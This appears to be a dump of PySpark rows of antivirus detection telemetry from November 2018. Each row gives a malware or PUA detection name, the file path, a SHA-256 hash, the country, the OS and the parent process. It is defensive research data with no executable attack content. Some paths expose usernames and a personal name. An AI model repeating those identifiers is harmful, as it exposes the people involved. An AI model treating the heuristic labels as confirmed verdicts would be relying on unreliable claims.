  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T03:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:26:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xerces-c_2_6.dll', filepath='C:\\AMD\\Win7-32Bit-Radeon-Software-Adrenalin-Edition-17.12.1-Dec11\\Bin\\xerces-c_2_6.dll', filesize=2864000, name='W32/Ramnit.C.#M1.#R1'), hash='b2baa527e6eca6d855ed2201dfbf65a04a887dd3273fb945b339666e6e5cba06', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1225616, timestamp='2018-11-04T09:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182510.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp101\\A0182510.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T03:10:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cpu_id.exe', filepath='e:\\pacarkdbellyedek2\\setupmuhendİslİk\\mathcad14\\mathcad\\program files\\mathcad\\mathcad 14\\cpu_id.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='ad66738b1ae36680beb447e692d641671d2fb2d77976998fe2471d8a0473739b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:05:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163841-fe5b7f94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6dd188d4\\AVSCAN-20181104-154238-9EA5EEC4\\AVSCAN-20181104-163841-FE5B7F94', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='85b2a4f1594c8b1c4b5899805517daf76fdf97ae31efe7caf45408440e785652', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:38:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='qmixer.dll', filepath='g:\\files\\العاب\\لعبة كراش عربيات\\direct3d\\QMIXER.DLL', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='5d38e295bd8f6629e23ca9ef1db41726911b0e4bdd7dd177c7616f34ecba51a2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:34:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6832729\\noceduti.VIR', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T20:17:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:18:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='4', parentproc=None, parentsize=None, timestamp='2018-11-04T15:21:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:36:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\New folder (3)\\New folder\\New folder (2)\\New folder\\New folder (2)\\Video\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T07:54:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:40:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132135-667a9089', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_8be28640\\AVSCAN-20181104-131239-138C782E\\AVSCAN-20181104-132135-667A9089', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:58:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-161754-3e0c2911', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ec32ac0\\AVSCAN-20181102-161732-3B48D06E\\AVSCAN-20181102-161754-3E0C2911', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150413-7617a915', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6072c6e4\\AVSCAN-20181102-145637-4E5F0371\\AVSCAN-20181102-150413-7617A915', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:04:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fviwxvsg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\fvIWxVsG.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='usbwriteprotector.exe', filepath='E:\\HBCD\\Programs\\USBWriteProtector.exe', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blankandsecure.exe', filepath='F:\\HBCD\\Programs\\BlankAndSecure.exe', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmpe42iu7q1', filepath='/tmp/tmpe42iu7q1', filesize=512000, name='PUA/BitcoinMiner.#M1.#R1'), hash='ac03da9c91f2cfb3adb873d286d9bc97f7b38463ea8d32a196f408b72e5f681d', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T08:24:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215855-b5b8af83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b8bdb9\\AVSCAN-20181102-215829-B1B0DBEF\\AVSCAN-20181102-215855-B5B8AF83', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:58:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081305-2a8ee5fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081305-2A8EE5FC', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='ES', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:29:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T20:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-185802-beade246', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47829443\\AVSCAN-20181102-183917-EDB97240\\AVSCAN-20181102-185802-BEADE246', filesize=384000, name='Adware/AD.Zdengo.A.#M1.#R1'), hash='c76279310e007b844360eb7c0ebfae9a58e5bbf00aba5241503d4affb09d1d1b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:58:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083206-bc50ebfd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083206-BC50EBFD', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spider-man setup.exe', filepath='\\\\?\\D:\\Spider Man\\Spider-Man Setup.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='fc7ac4d8fab824499d4ba70077263fbc8f7a157076cb8363a05ee9eb855dce11', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:14:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00004bac', filepath='C:\\Windows\\Temp\\tmp00007e15\\tmp00004bac', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='cfc00d423523404488ade7965fd51ceff8f4378e664e193ee89a7aa52719d734', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T08:32:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='excel-web.xlt', filepath='C:\\Program Files\\KS\\smeta_ks9\\REPORT\\EXCEL-WEB.XLT', filesize=216000, name='X2000M/Agent.03377832.#M1.#R1'), hash='c52be89ae90b960543b102a1c17cfbb7ab10e25d2cbbe7d6e33ba51f48175b19', metadata=Row(cmdline='S', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\KS\\smeta_ks9\\ks.exe', parentsize=28453, timestamp='2018-11-02T06:27:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182021-2c949807', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_244c8d5a\\AVSCAN-20181102-182008-2A2D89FD\\AVSCAN-20181102-182021-2C949807', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:20:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0112051.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0112051.exe', filesize=192000, name='W32/Viking.AT.#M1.#R1'), hash='e018890c01134389ad718d1060fab0af08bd9d10b374fb7b6e66b4b2e9d0fb35', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-075132-046cabd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-075132-046CABD4', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='c3a1132288e96fe91a32c23fc02893891960b16442999556138d832d835c4a18', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:53:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='armcpp.exe', filepath='\\\\?\\C:\\Program Files\\ARM\\RVCT\\Programs\\3.1\\569\\win_32-pentium\\armcpp.exe', filesize=8192000, name='W32/Ramnit.CD.#M1.#R1'), hash='e33e793188eb4f6528511a687c4341b915394ec6590538d6714516b391818516', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:41:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reg.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='d922a3297ae1ebb739432aeeeba1efbc3671d3a1d172ba458618732fd5fef2ef', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:28:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='аккредитац.2017г.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Аккредитац.2017г.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:51:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T20:24:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='герасимова э.е.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка на 2015 год\\Герасимова Э.Е.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122121-2be091c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_daa8269a\\AVSCAN-20181102-121307-ECC2A9D1\\AVSCAN-20181102-122121-2BE091C8', filesize=832000, name='TR/Snarasite.a25568.#M1.#R1'), hash='a255680f3fe65b357721d161e9626e893d3fdaa817a6362a5928ad9dab7441d2', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:09:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gm5upd.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\gm5upd.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9bb403827bdf8c1112a659c220caaa0bef77a0c960175bdae55d23ca93973d52', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\gm5test\\gm5.exe', parentsize=888832, timestamp='2018-11-02T16:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='689342.exe', filepath='D:\\689342.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R4205'), hash='ed139557bf929c41df2cdcbf76798223f60d07b15816ab7cada3787008faf3cc', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T16:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='quick3dinputplugin.dll', filepath='D:\\DB\\pkgs\\qt-5.9.6-vc14h1e9a669_3\\Library\\qml\\Qt3D\\Input\\quick3dinputplugin.dll', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='9ed9b02087f96a1d6b81fdd1754c1be5848276f658329f6aeebb2c6d25c1ed86', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:39:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:13:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='label_44796569.doc', filepath='C:\\TMP\\01\\_virs\\label_44796569.doc', filesize=64000, name='W97M/Agent.960461927.#M1.#R1'), hash='fb467c5ef6a5a7ce1db165b458c64aff8d5ca5e813712201abe7d73a7b0048b7', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237d54', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237d54', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:13:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='corel visual intelligence 1.0 1.0 by iwdownload.exe', filepath='P:\\cdr\\2017\\apneu\\breath\\dir-001\\mediq\\Corel Visual Intelligence 1.0 1.0 by iwdownload.exe', filesize=668000, name='PUA/InstallCore.Gen7.#M300.#R600538'), hash='c807c705aa5ff0b78eb10315fff7a3798d28fad037061eb027346baaf5943d1b', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\totalcmd850\\TOTALCMD64.EXE', parentsize=8937608, timestamp='2018-11-04T18:16:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0010866.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0010866.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:38:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292dbf', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292dbf', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:19:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:02:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T02:37:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dcbafedcbaafedcbafedcbaafedcbafedcbaafedcbfecbfdbbafedcbafeee.dcbafedcbaafedcbafedcbaafedcbafedcbaafedcbfecbfdbbafedcbafeee', filepath='\\?\\J:\\\xa0\\dcbafedcbaafedcbafedcbaafedcbafedcbaafedcbfecbfdbbafedcbafeee.dcbafedcbaafedcbafedcbaafedcbafedcbaafedcbfecbfdbbafedcbafeee', filesize=7936000, name='TR/Crypt.ZPACK.Gen7.#M300.#R604114'), hash='c4b72ecad35ec5863d9c7fb15d047fd6c972c5585f7891c55808e568a5a7b07c', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:24:01Z'), dt=datetime.date(2018, 11, 4)),
